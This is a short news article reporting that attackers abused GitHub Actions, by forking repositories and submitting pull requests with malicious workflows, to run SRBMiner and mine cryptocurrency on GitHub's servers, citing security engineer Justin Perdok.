It has been discovered that a group of Hackers have long been using GitHub’s cloud infrastructure to mine covertly multiple cryptocurrencies. The attacks were first detected by a French software engineer in November 2020 and a team of development platform workers confirmed to The Record medium that it was true. Now the platform is thoroughly investigating what has happened and who could be the cause of this illegal action.
According to the discoveries, the attack took advantage of a GitHub feature called GitHub Actions, which allows users to automatically run tasks and workflows triggered by a certain event that occurs within their repositories.
For launching cryptocurrency mining software, attackers forked an existing repository, they added a malicious GitHub Actions element to the original code, and then they presented a Pull Request (a term used in English or that can also be translated as “Validation Request”) with the original repository to merge the code back into the original, according to the information of The Record.
Only objective: get free coins
The original project owner did not have to approve that malicious validation request, as right after submitting it, GitHub systems read the attacker’s code and launched a virtual machine, capable of downloading and running cryptocurrency mining software, as explained by Dutch security engineer Justin Perdok.
Miner itself is downloaded from gitlab. pic.twitter.com/5twTjuL2vK
– Justin Perdok (@JustinPerdok) April 2, 2021
The software used for mining, according to the screenshot posted (and shared in this article), included SRBMiner, a software for mining multiple cryptocurrencies using consumer-friendly hardware that is easy to buy, specifically GPUs and CPUs.
In any case, it appears that the attackers weren’t looking to damage the repositories in any way, just to get free coins using GitHub’s servers, according to the report.